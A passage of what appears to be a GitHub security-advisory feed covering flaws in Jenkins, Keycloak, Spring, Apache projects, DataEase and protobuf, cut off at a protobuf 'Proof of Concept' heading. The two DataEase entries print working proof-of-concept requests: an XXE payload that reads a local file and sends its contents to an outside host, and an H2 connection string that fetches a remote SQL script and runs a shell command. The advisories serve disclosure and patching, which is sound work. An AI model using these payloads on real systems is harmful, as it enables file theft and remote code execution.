<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47561" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47561</a></li>
<li><a href="https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x" rel="nofollow">https://lists.apache.org/thread/c2v7mhqnmq0jmbwxqq3r5jbj1xg43h5x</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-r7pg-v2c8-mfg3</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-r7pg-v2c8-mfg3</guid>
<pubDate>Thu, 03 Oct 2024 12:30:48 GMT</pubDate>
</item>
<item>
<title>Jenkins Credentials plugin reveals encrypted values of credentials to users with Extended Read permission</title>
<description><p>Jenkins Credentials Plugin 1380.va_435002fa_924 and earlier, except 1371.1373.v4eb_fa_b_7161e9, does not redact encrypted values of credentials using the <code class="notranslate">SecretBytes</code> type (e.g., Certificate credentials, or Secret file credentials from Plain Credentials Plugin) when accessing item <code class="notranslate">config.xml</code> via REST API or CLI.</p>
<p>This allows attackers with Item/Extended Read permission to view encrypted <code class="notranslate">SecretBytes</code> values in credentials.</p>
<p>This issue is similar to SECURITY-266 in the 2016-05-11 security advisory, which applied to the <code class="notranslate">Secret</code> type used for inline secrets and some credentials types.</p>
<p>Credentials Plugin 1381.v2c3a_12074da_b_ redacts the encrypted values of credentials using the <code class="notranslate">SecretBytes</code> type in item <code class="notranslate">config.xml</code> files.</p>
<p>This fix is only effective on Jenkins 2.479 and newer, LTS 2.462.3 and newer. While Credentials Plugin 1381.v2c3a_12074da_b_ can be installed on Jenkins 2.463 through 2.478 (both inclusive), encrypted values of credentials using the <code class="notranslate">SecretBytes</code> type will not be redacted when accessing item <code class="notranslate">config.xml</code> via REST API or CLI.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47805" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47805</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3373" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3373</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-62jv-j4w7-5hh8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-62jv-j4w7-5hh8</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins item creation restriction bypass vulnerability</title>
<description><p>Jenkins provides APIs for fine-grained control of item creation:</p>
<ul>
<li>
<p>Authorization strategies can prohibit the creation of items of a given type in a given item group (<code class="notranslate">ACL#hasCreatePermission2</code>).</p>
</li>
<li>
<p>Item types can prohibit creation of new instances in a given item group (<code class="notranslate">TopLevelItemDescriptor#isApplicableIn(ItemGroup)</code>).</p>
</li>
</ul>
<p>If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.478 and earlier, LTS 2.462.2 and earlier creates the item in memory, only deleting it from disk.</p>
<p>This allows attackers with Item/Create permission to bypass these restrictions, creating a temporary item. With Item/Configure permission, they can also save the item to persist it.</p>
<p>If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.479, LTS 2.462.3 does not retain the item in memory.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47804" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47804</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3448" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3448</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f9qj-77q2-h5c5</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f9qj-77q2-h5c5</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins OpenId Connect Authentication Plugin lacks issuer claim validation</title>
<description><p>Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the <code class="notranslate">iss</code> (Issuer) claim of an ID Token during its authentication flow, a value that identifies the Originating Party (IdP).</p>
<p>This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins.</p>
<p>OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the <code class="notranslate">iss</code> (Issuer) claim of an ID Token during its authentication flow when the Issuer is known.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47807" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47807</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(2)" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(2)</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-8pjw-fff6-3mjv</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-8pjw-fff6-3mjv</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins OpenId Connect Authentication Plugin lacks audience claim validation</title>
<description><p>Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the <code class="notranslate">aud</code> (Audience) claim of an ID Token during its authentication flow, a value to verify the token is issued for the correct client.</p>
<p>This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins.</p>
<p>OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the <code class="notranslate">aud</code> (Audience) claim of an ID Token during its authentication flow.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47806" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47806</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(1)" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3441%20(1)</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-49hx-9mm2-7675</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-49hx-9mm2-7675</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Jenkins exposes multi-line secrets through error messages</title>
<description><p>Jenkins</p>
<p>Jenkins provides the <code class="notranslate">secretTextarea</code> form field for multi-line secrets.</p>
<p>Jenkins 2.478 and earlier, LTS 2.462.2 and earlier does not redact multi-line secret values in error messages generated for form submissions involving the <code class="notranslate">secretTextarea</code> form field.</p>
<p>This can result in exposure of multi-line secrets through those error messages, e.g., in the system log.</p>
<p>Jenkins 2.479, LTS 2.462.3 redacts multi-line secret values in error messages generated for form submissions involving the <code class="notranslate">secretTextarea</code> form field.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47803" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47803</a></li>
<li><a href="https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3451" rel="nofollow">https://www.jenkins.io/security/advisory/2024-10-02/#SECURITY-3451</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-pj95-ph4q-4qm4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-pj95-ph4q-4qm4</guid>
<pubDate>Wed, 02 Oct 2024 18:31:32 GMT</pubDate>
</item>
<item>
<title>Eclipse Glassfish improperly handles http parameters</title>
<description><p>In Eclipse Glassfish versions before 7.0.17, the Host HTTP parameter could cause the web application to redirect to the specified URL, when the requested endpoint is <code class="notranslate">/management/domain</code>. By modifying the URL value to a malicious site, an attacker may successfully launch a phishing scam and steal user credentials.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-9329" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-9329</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2473331185" data-permission-text="Title is private" data-url="https://github.com/eclipse-ee4j/glassfish/issues/25106" data-hovercard-type="pull_request" data-hovercard-url="/eclipse-ee4j/glassfish/pull/25106/hovercard" href="https://github.com/eclipse-ee4j/glassfish/pull/25106">eclipse-ee4j/glassfish#25106</a></li>
<li><a href="https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/232" rel="nofollow">https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/232</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/eclipse-ee4j/glassfish/commit/6ca35eee2ba90a8108984b27bec33f9cc50cd83b/hovercard" href="https://github.com/eclipse-ee4j/glassfish/commit/6ca35eee2ba90a8108984b27bec33f9cc50cd83b">eclipse-ee4j/glassfish@<tt>6ca35ee</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-jq3f-mfmg-747x</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-jq3f-mfmg-747x</guid>
<pubDate>Mon, 30 Sep 2024 09:30:47 GMT</pubDate>
</item>
<item>
<title>Deserialization of Untrusted Data vulnerability in Apache Lucene Replicator.</title>
<description><p>This issue affects Apache Lucene's replicator module: from 4.4.0 before 9.12.0.<br>
The deprecated org.apache.lucene.replicator.http package is affected.<br>
The org.apache.lucene.replicator.nrt package is not affected.</p>
<p>Users are recommended to upgrade to version 9.12.0, which fixes the issue.</p>
<p>Java serialization filters (such as&nbsp;-Djdk.serialFilter='!*' on the commandline) can mitigate the issue on vulnerable versions without impacting functionality.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45772" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-45772</a></li>
<li><a href="https://lists.apache.org/thread/3f3oph7bqnqspb9q5p0gm5mgc1b6thjo" rel="nofollow">https://lists.apache.org/thread/3f3oph7bqnqspb9q5p0gm5mgc1b6thjo</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-g643-xq6w-r67c</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-g643-xq6w-r67c</guid>
<pubDate>Mon, 30 Sep 2024 09:30:47 GMT</pubDate>
</item>
<item>
<title>Maven Archetype Plugin: Maven Archetype integration-test may package local settings into the published artifact, possibly containing credentials</title>
<description><p>Exposure of Sensitive Information to an Unauthorized Actor, Insecure Storage of Sensitive Information vulnerability in Maven Archetype Plugin.</p>
<p>This issue affects Maven Archetype Plugin: from 3.2.1 before 3.3.0.</p>
<p>Users are recommended to upgrade to version 3.3.0, which fixes the issue.</p>
<p>Archetype integration testing creates a file<br>
called ./target/classes/archetype-it/archetype-settings.xml<br>
This file contains all the content from the users ~/.m2/settings.xml file,<br>
which often contains information they do not want to publish. We expect that on many developer machines, this also contains<br>
credentials.</p>
<p>When the user runs mvn verify again (without a mvn clean), this file becomes part of the final artifact.</p>
<p>If a developer were to publish this into Maven Central or any other remote repository (whether as a release or a snapshot) their credentials would be published without them knowing.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-47197" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-47197</a></li>
<li><a href="https://lists.apache.org/thread/ftg81np183wnyk0kg4ks95dvgxdrof96" rel="nofollow">https://lists.apache.org/thread/ftg81np183wnyk0kg4ks95dvgxdrof96</a></li>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2229915212" data-permission-text="Title is private" data-url="https://github.com/apache/maven-archetype/issues/188" data-hovercard-type="pull_request" data-hovercard-url="/apache/maven-archetype/pull/188/hovercard" href="https://github.com/apache/maven-archetype/pull/188">apache/maven-archetype#188</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/apache/maven-archetype/commit/484b6ab946f0d7ce557a3df28615d8c51e500054/hovercard" href="https://github.com/apache/maven-archetype/commit/484b6ab946f0d7ce557a3df28615d8c51e500054">apache/maven-archetype@<tt>484b6ab</tt></a></li>
<li><a href="https://issues.apache.org/jira/browse/ARCHETYPE-657" rel="nofollow">https://issues.apache.org/jira/browse/ARCHETYPE-657</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-2qq7-fch2-phqf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-2qq7-fch2-phqf</guid>
<pubDate>Thu, 26 Sep 2024 09:31:42 GMT</pubDate>
</item>
<item>
<title>Apache Hadoop: Temporary File Local Information Disclosure</title>
<description><p>Apache Hadoop’s <code class="notranslate">RunJar.run()</code>&nbsp;does not set permissions for temporary directory&nbsp;by default. If sensitive data will be present in this file, all the other local users may be able to view the content. This is because, on unix-like systems, the system temporary directory is shared between all local users. As such, files written in this directory, without setting the correct posix permissions explicitly, may be viewable by all other local users.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-23454" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-23454</a></li>
<li><a href="https://issues.apache.org/jira/browse/HADOOP-19031" rel="nofollow">https://issues.apache.org/jira/browse/HADOOP-19031</a></li>
<li><a href="https://lists.apache.org/thread/xlo7q8kn4tsjvx059r789oz19hzgfkfs" rel="nofollow">https://lists.apache.org/thread/xlo7q8kn4tsjvx059r789oz19hzgfkfs</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/apache/hadoop/commit/8c2836402fbb2f619f1fef4ef625a8542e853a64/hovercard" href="https://github.com/apache/hadoop/commit/8c2836402fbb2f619f1fef4ef625a8542e853a64">apache/hadoop@<tt>8c28364</tt></a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f5fw-25gw-5m92</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f5fw-25gw-5m92</guid>
<pubDate>Wed, 25 Sep 2024 09:30:46 GMT</pubDate>
</item>
<item>
<title>Apache Linkis Spark EngineConn: Commons Lang's RandomStringUtils Random string security vulnerability</title>
<description><p>In Apache Linkis &lt;= 1.5.0, a Random string security vulnerability in Spark EngineConn,&nbsp;random string generated by the Token when starting Py4j uses the Commons Lang's RandomStringUtils.<br>
Users are recommended to upgrade to version 1.6.0, which fixes this issue.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-39928" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-39928</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/apache/linkis/commit/82c2f4b201b746e9206bb58ef98f536fc333aa07/hovercard" href="https://github.com/apache/linkis/commit/82c2f4b201b746e9206bb58ef98f536fc333aa07">apache/linkis@<tt>82c2f4b</tt></a></li>
<li><a href="https://lists.apache.org/thread/g664n13nb17rsogcfrn8kjgd8m89p8nw" rel="nofollow">https://lists.apache.org/thread/g664n13nb17rsogcfrn8kjgd8m89p8nw</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6gch-63wp-4v5f</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6gch-63wp-4v5f</guid>
<pubDate>Wed, 25 Sep 2024 03:30:35 GMT</pubDate>
</item>
<item>
<title>Spring Framework DoS via conditional HTTP request</title>
<description><h3>Description</h3>
<p>Applications that parse ETags from <code class="notranslate">If-Match</code> or <code class="notranslate">If-None-Match</code> request headers are vulnerable to DoS attack.</p>
<h3>Affected Spring Products and Versions</h3>
<p>org.springframework:spring-web in versions</p>
<p>6.1.0 through 6.1.11<br>
6.0.0 through 6.0.22<br>
5.3.0 through 5.3.37</p>
<p>Older, unsupported versions are also affected</p>
<h3>Mitigation</h3>
<p>Users of affected versions should upgrade to the corresponding fixed version.<br>
6.1.x -&gt; 6.1.12<br>
6.0.x -&gt; 6.0.23<br>
5.3.x -&gt; 5.3.38<br>
No other mitigation steps are necessary.</p>
<p>Users of older, unsupported versions could enforce a size limit on <code class="notranslate">If-Match</code> and <code class="notranslate">If-None-Match</code> headers, e.g. through a Filter.</p>
<h3>References</h3>
<ul>
<li><a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="2461347390" data-permission-text="Title is private" data-url="https://github.com/spring-projects/spring-framework/issues/33372" data-hovercard-type="issue" data-hovercard-url="/spring-projects/spring-framework/issues/33372/hovercard" href="https://github.com/spring-projects/spring-framework/issues/33372">spring-projects/spring-framework#33372</a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/spring-projects/spring-framework/commit/582bfccbb72e5c8959a0b472d1dc7d03a20520f3/hovercard" href="https://github.com/spring-projects/spring-framework/commit/582bfccbb72e5c8959a0b472d1dc7d03a20520f3">spring-projects/spring-framework@<tt>582bfcc</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/spring-projects/spring-framework/commit/8d16a50907c11f7e6b407d878a26e84eba08a533/hovercard" href="https://github.com/spring-projects/spring-framework/commit/8d16a50907c11f7e6b407d878a26e84eba08a533">spring-projects/spring-framework@<tt>8d16a50</tt></a></li>
<li><a class="commit-link" data-hovercard-type="commit" data-hovercard-url="https://github.com/spring-projects/spring-framework/commit/bb17ad8314b81850a939fd265fb53b3361705e85/hovercard" href="https://github.com/spring-projects/spring-framework/commit/bb17ad8314b81850a939fd265fb53b3361705e85">spring-projects/spring-framework@<tt>bb17ad8</tt></a></li>
<li><a href="https://spring.io/security/cve-2024-38809" rel="nofollow">https://spring.io/security/cve-2024-38809</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-38809" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-38809</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-2rmj-mq67-h97g</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-2rmj-mq67-h97g</guid>
<pubDate>Tue, 24 Sep 2024 18:34:43 GMT</pubDate>
</item>
<item>
<title>DataEase has an XML External Entity Reference vulnerability</title>
<description><h3>Impact</h3>
<p>There is an XML external entity injection vulnerability in the static resource upload interface of DataEase. An attacker can construct a payload to implement intranet detection and file reading.</p>
<ol>
<li>send request:</li>
</ol>
<pre class="notranslate"><code class="notranslate">POST /de2api/staticResource/upload/1 HTTP/1.1
Host: dataease.ubuntu20.vm
Content-Length: 348
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: jwt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.60 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6OZBNygiUCAZEbMn
------WebKitFormBoundary6OZBNygiUCAZEbMn
Content-Disposition: form-data; name="file"; filename="1.svg"
Content-Type: a
&lt;?xml version='1.0'?&gt;
&lt;!DOCTYPE xxe [
&lt;!ENTITY % EvilDTD SYSTEM 'http://10.168.174.1:8000/1.dtd'&gt;
%EvilDTD;
%LoadOOBEnt;
%OOB;
]&gt;
------WebKitFormBoundary6OZBNygiUCAZEbMn--
// 1.dtd的内容
&lt;!ENTITY % resource SYSTEM "file:///etc/alpine-release"&gt;
&lt;!ENTITY % LoadOOBEnt "&lt;!ENTITY &amp;#x25; OOB SYSTEM 'http://10.168.174.1:8000/?content=%resource;'&gt;"&gt;
</code></pre>
<ol start="2">
<li>After sending the request, the content of the file /etc/alpine-release is successfully read</li>
</ol>
<pre class="notranslate"><code class="notranslate">::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /1.dtd HTTP/1.1" 200 -
::ffff:10.168.174.136 - - [16/Sep/2024 10:23:44] "GET /?content=3.20.0 HTTP/1.1" 200 -
</code></pre>
<p>Affected versions: &lt;= 2.10.0</p>
<h3>Patches</h3>
<p>The vulnerability has been fixed in v2.10.1.</p>
<h3>Workarounds</h3>
<p>It is recommended to upgrade the version to v2.10.1.</p>
<h3>References</h3>
<p>If you have any questions or comments about this advisory:</p>
<p>Open an issue in <a href="https://github.com/dataease/dataease">https://github.com/dataease/dataease</a><br>
Email us at <a href="mailto:wei@fit2cloud.com">wei@fit2cloud.com</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-4m9p-7xg6-f4mm" href="https://github.com/dataease/dataease/security/advisories/GHSA-4m9p-7xg6-f4mm">GHSA-4m9p-7xg6-f4mm</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46985" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46985</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4m9p-7xg6-f4mm</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4m9p-7xg6-f4mm</guid>
<pubDate>Mon, 23 Sep 2024 20:27:22 GMT</pubDate>
</item>
<item>
<title>DataEase's H2 datasource has a remote command execution risk</title>
<description><h3>Impact</h3>
<p>An attacker can achieve remote command execution by adding a carefully constructed h2 data source connection string.</p>
<p>request message:</p>
<pre class="notranslate"><code class="notranslate">POST /de2api/datasource/validate HTTP/1.1
Host: dataease.ubuntu20.vm
User-Agent: python-requests/2.31.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-DE-TOKEN: jwt
Content-Length: 209
Content-Type: application/json
{
"id": "",
"name": "test",
"type": "h2",
"configuration": "eyJqZGJjIjogImpkYmM6aDI6bWVtOnRlc3Q7VFJBQ0VfTEVWRUxfU1lTVEVNX09VVD0zO0lOSVQ9UlVOU0NSSVBUIEZST00gJ2h0dHA6Ly8xMC4xNjguMTc0LjE6ODAwMC9wb2Muc3FsJzsifQ=="
}
</code></pre>
<p>h2 data source connection string:</p>
<pre class="notranslate"><code class="notranslate">// configuration
{
"jdbc": "jdbc:h2:mem:test;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '[http://10.168.174.1:8000/poc.sql'](http://10.168.174.1:8000/poc.sql%27);",
}
</code></pre>
<p>the content of poc.sql:</p>
<pre class="notranslate"><code class="notranslate">// poc.sql
CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "su18";}';CALL EXEC ('touch /tmp/jdbch2rce')
</code></pre>
<p>You can see that the file was created successfully in docker:</p>
<pre class="notranslate"><code class="notranslate">/tmp # ls -l jdbch2rce
-rw-r--r-- 1 root root 0 Sep 16 22:02 jdbch2rce
</code></pre>
<p>Affected versions: &lt;= 2.10.0</p>
<h3>Patches</h3>
<p>The vulnerability has been fixed in v2.10.1.</p>
<h3>Workarounds</h3>
<p>It is recommended to upgrade the version to v2.10.1.</p>
<h3>References</h3>
<p>If you have any questions or comments about this advisory:</p>
<p>Open an issue in <a href="https://github.com/dataease/dataease">https://github.com/dataease/dataease</a><br>
Email us at <a href="mailto:wei@fit2cloud.com">wei@fit2cloud.com</a></p>
<h3>References</h3>
<ul>
<li><a title="GHSA-h7mj-m72h-qm8w" href="https://github.com/dataease/dataease/security/advisories/GHSA-h7mj-m72h-qm8w">GHSA-h7mj-m72h-qm8w</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-46997" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-46997</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-h7mj-m72h-qm8w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-h7mj-m72h-qm8w</guid>
<pubDate>Mon, 23 Sep 2024 20:27:11 GMT</pubDate>
</item>
<item>
<title>Keycloak SAML signature validation flaw</title>
<description><p>A flaw exists in the SAML signature validation method within the Keycloak XMLSignatureUtil class. The method incorrectly determines whether a SAML signature is for the full document or only for specific assertions based on the position of the signature in the XML document, rather than the Reference element used to specify the signed element. This flaw allows attackers to create crafted responses that can bypass the validation, potentially leading to privilege escalation or impersonation attacks.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8698" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8698</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-8698" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-8698</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2311641" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2311641</a></li>
<li><a href="https://github.com/keycloak/keycloak/blob/main/saml-core/src/main/java/org/keycloak/saml/processing/core/util/XMLSignatureUtil.java#L415">https://github.com/keycloak/keycloak/blob/main/saml-core/src/main/java/org/keycloak/saml/processing/core/util/XMLSignatureUtil.java#L415</a></li>
<li><a href="https://github.com/keycloak/keycloak/releases/tag/25.0.6">https://github.com/keycloak/keycloak/releases/tag/25.0.6</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6878" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6878</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6879" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6879</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6880" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6880</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6882" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6882</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6886" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6886</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6887" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6887</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6888" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6888</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6889" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6889</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6890" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6890</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-4xx7-2cx3-x473</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-4xx7-2cx3-x473</guid>
<pubDate>Thu, 19 Sep 2024 18:30:52 GMT</pubDate>
</item>
<item>
<title>Keycloak Open Redirect vulnerability</title>
<description><p>A misconfiguration flaw was found in Keycloak. This issue can allow an attacker to redirect users to an arbitrary URL if a 'Valid Redirect URI' is set to <a href="http://localhost/" rel="nofollow">http://localhost</a> or <a href="http://127.0.0.1/" rel="nofollow">http://127.0.0.1</a>, enabling sensitive information such as authorization codes to be exposed to the attacker, potentially leading to session hijacking.</p>
<h3>References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-8883" rel="nofollow">https://nvd.nist.gov/vuln/detail/CVE-2024-8883</a></li>
<li><a href="https://access.redhat.com/security/cve/CVE-2024-8883" rel="nofollow">https://access.redhat.com/security/cve/CVE-2024-8883</a></li>
<li><a href="https://bugzilla.redhat.com/show_bug.cgi?id=2312511" rel="nofollow">https://bugzilla.redhat.com/show_bug.cgi?id=2312511</a></li>
<li><a href="https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java">https://github.com/keycloak/keycloak/blob/main/services/src/main/java/org/keycloak/protocol/oidc/utils/RedirectUtils.java</a></li>
<li><a href="https://github.com/keycloak/keycloak/releases/tag/25.0.6">https://github.com/keycloak/keycloak/releases/tag/25.0.6</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6878" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6878</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6879" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6879</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6880" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6880</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6882" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6882</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6886" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6886</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6887" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6887</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6888" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6888</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6889" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6889</a></li>
<li><a href="https://access.redhat.com/errata/RHSA-2024:6890" rel="nofollow">https://access.redhat.com/errata/RHSA-2024:6890</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-vvf8-2h68-9475</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-vvf8-2h68-9475</guid>
<pubDate>Thu, 19 Sep 2024 18:30:52 GMT</pubDate>
</item>
<item>
<title>protobuf-java has potential Denial of Service issue</title>
<description><h3>Summary</h3>
<p>When parsing unknown fields in the Protobuf Java Lite and Full library, a maliciously crafted message can cause a StackOverflow error and lead to a program crash.</p>
<p>Reporter: Alexis Challande, Trail of Bits Ecosystem Security Team <a href="mailto:ecosystem@trailofbits.com">ecosystem@trailofbits.com</a></p>
<p>Affected versions: This issue affects all versions of both the Java full and lite Protobuf runtimes, as well as Protobuf for Kotlin and JRuby, which themselves use the Java Protobuf runtime.</p>
<h3>Severity</h3>
<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7254" rel="nofollow">CVE-2024-7254</a> <strong>High</strong> CVSS4.0 Score 8.7 (NOTE: there may be a delay in publication)<br>
This is a potential Denial of Service. Parsing nested groups as unknown fields with DiscardUnknownFieldsParser or Java Protobuf Lite parser, or against Protobuf map fields, creates unbounded recursions that can be abused by an attacker.</p>
<h3>Proof of Concept</h3>
